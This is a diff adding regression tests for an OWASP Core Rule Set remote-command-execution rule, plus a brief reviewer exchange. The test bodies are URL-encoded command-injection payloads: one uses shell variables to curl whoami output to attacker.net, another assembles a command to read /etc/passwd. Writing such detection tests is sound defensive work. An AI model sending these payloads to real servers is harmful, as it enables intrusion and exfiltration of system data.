tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml

```diff
@@ -230,3 +230,37 @@ tests:
             version: HTTP/1.0
           output:
             log_contains: id "932200"
+  - test_title: 932200-15
+    desc: "Add test to match BB EBIDJ91T"
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            data: a%3Dcurl%26%26b%3Dwhoami%26%26%24a%20attacker.net%2F%24b
+            headers:
+              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+              Host: localhost
+              User-Agent: OWASP ModSecurity Core Rule Set
+            method: POST
+            port: 80
+            uri: /
+            version: HTTP/1.0
+          output:
+            log_contains: id "932200"
+  - test_title: 932200-16
+    desc: "Add test to match BB MKXQCJMX"
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            data: a%3D%2Fetc%26%26b%3D%2Fpasswd%26%26c%3Dcat%26%26%24c%20%24a%24b
```

Comment:
Again a diff to the curl_1.sh payload. Why?

Reply:
No clue. Changed to original in report.